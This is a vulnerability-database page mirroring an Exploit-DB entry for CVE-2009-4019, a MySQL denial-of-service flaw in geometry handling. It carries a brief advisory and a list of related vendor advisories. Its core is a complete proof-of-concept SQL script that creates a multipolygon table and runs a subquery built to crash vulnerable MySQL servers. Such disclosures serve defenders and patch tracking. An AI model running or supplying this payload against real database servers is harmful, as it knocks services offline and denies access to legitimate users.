Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbShane BesterEDB-ID:33398
HistoryNov 23, 2009 - 12:00 a.m.

MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service

2009-11-2300:00:00
Shane Bester
www.exploit-db.com
41

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/37297/info
 
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
 
An attacker can exploit these issues to crash the application, denying access to legitimate users.
 
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 

drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values 
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where 
`c0` <>  (select geometrycollectionfromwkb(`c3`) from `t1`);

Related

prion 1
seebug 3
nessus 25
exploitdb 1
ubuntucve 1
cvelist 1
nvd 1
veracode 1
cve 1
openvas 39
fedora 10
oraclelinux 1
redhat 1
osv 1
centos 1
securityvulns 2
debian 2
ubuntu 2
gentoo 1
threatpost 1
prion
prion
Code injection
2009-11-30 17:30:00
seebug
seebug
MySQL倚δΈͺη•Έε½’SQLζ“δ½œε€„η†ζ‹’η»ζœεŠ‘ζΌζ΄ž
2009-12-17 00:00:00
MySQL SELECTθ―­ε₯ε€„η†ζ‹’η»ζœεŠ‘ζΌζ΄ž
2009-12-02 00:00:00
MySQL vulnerabilities
2010-02-13 00:00:00
nessus
nessus
Fedora 10 : mysql-5.0.88-1.fc10 (2009-12180)
2009-12-14 00:00:00
Fedora 12 : mysql-5.1.41-2.fc12 (2009-13466)
2009-12-22 00:00:00
Fedora 11 : mysql-5.1.41-2.fc11 (2009-13504)
2009-12-22 00:00:00
exploitdb
exploitdb
MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service
2009-11-23 00:00:00
ubuntucve
ubuntucve
CVE-2009-4019
2009-11-30 00:00:00
cvelist
cvelist
CVE-2009-4019
2009-11-30 17:00:00
nvd
nvd
CVE-2009-4019
2009-11-30 17:30:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:43:12
cve
cve
CVE-2009-4019
2009-11-30 17:30:00
openvas
openvas
Fedora Core 12 FEDORA-2009-13466 (mysql)
2009-12-30 00:00:00
Fedora Update for mysql FEDORA-2010-1348
2010-03-02 00:00:00
MySQL Denial Of Service and Spoofing Vulnerabilities
2009-12-04 00:00:00
fedora
fedora
[SECURITY] Fedora 11 Update: mysql-5.1.42-7.fc11
2010-02-02 01:06:45
[SECURITY] Fedora 12 Update: mysql-5.1.42-7.fc12
2010-02-02 01:18:20
[SECURITY] Fedora 12 Update: mysql-5.1.41-2.fc12
2009-12-22 04:48:21
oraclelinux
oraclelinux
mysql security update
2010-02-16 00:00:00
redhat
redhat
(RHSA-2010:0109) Moderate: mysql security update
2010-02-16 00:00:00
osv
osv
mysql-dfsg-5.0 - several vulnerabilities
2010-02-14 00:00:00
centos
centos
mysql security update
2010-03-01 18:43:17
securityvulns
securityvulns
MySQL multiple security vulnerabilities
2010-01-19 00:00:00
[ MDVSA-2010:012 ] mysql
2010-01-19 00:00:00
debian
debian
[SECURITY] [DSA-1997-1] New mysql-dfsg-5.0 packages fix several vulnerabilities
2010-02-14 12:28:59
[SECURITY] [DSA-1997-1] New mysql-dfsg-5.0 packages fix several vulnerabilities
2010-02-14 12:28:59
ubuntu
ubuntu
MySQL vulnerabilities
2010-02-10 00:00:00
MySQL vulnerabilities
2012-03-12 00:00:00
gentoo
gentoo
MySQL: Multiple vulnerabilities
2012-01-05 00:00:00
threatpost
threatpost
Apple Mega Patch Covers 88 Mac OS X Vulnerabilities
2010-03-29 17:15:44

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:33398
prion1seebug3nessus25exploitdb1ubuntucve1cvelist1nvd1veracode1cve1openvas39fedora10oraclelinux1redhat1osv1centos1securityvulns2debian2ubuntu2gentoo1threatpost1